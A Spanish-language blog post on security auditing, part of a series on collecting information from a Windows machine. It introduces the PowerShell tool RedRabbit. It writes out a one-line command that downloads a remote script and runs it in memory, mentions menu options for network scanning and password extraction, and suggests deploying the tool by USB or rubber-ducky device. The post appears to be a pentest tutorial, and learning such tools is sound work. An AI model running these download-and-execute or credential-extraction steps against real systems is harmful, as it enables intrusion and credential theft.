lunes, 30 de marzo de 2020

¨Recolectando información de mi Windows (III)


Hola de nuevo!!

Seguimos enclaustrados y la verdad, es que trabajando a tope. Se nota que con esta situación, aprovechais para estudiar, lo cual es bueno!!! De un problema una oportunidad!

Vamos a por otra herramienta en powershell que nos saca información del equipo auditado. En este caso, usaremos RedRabbit.
La podeis descargar desde aquí. O bien podeis llamar a la herramienta desde donde se aloja. en vuestro servidor de ataque o bien desde github.

Nosotros usaremos esto último, porque siempre tendremos la ventaja de que usaremos siempre la ultima version.

Abrimos el cmd como administrador si podemos y ejecutamos la instruccion siguiente:

powershell –nop –c “iex(New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/securethelogs/RedRabbit/master/redrabbit.ps1’)”



 Una vez ejecutado, nos aparece un panel como este.



 Aquí tenemos una variedad de acciones que podemos realizar según lo que necesitemos sobre el objetivo.
Si queremos un analisis inicial, podremos poner la opcion 1. Si queremos escaneaar la red, la opcion 2 o 4...
Podemos intentar sacar passwords con la opcion 10, por ejemplo...



Lo interesante sería usar por ejemplo un usb como vimos en la entrada anterior, http://www.esbozosecreto.com/2020/03/recolectando-informacion-de-mi-windows.html , o bien usar un usb tipo rubber ducky para automatizar el proceso...

Pues a jugar un poquito  con la herramienta que tiene aplicaciones muy interesantes!!!

Saludos y a por otra semana enclaustrados

@fsanz_moya

No hay comentarios:

Publicar un comentario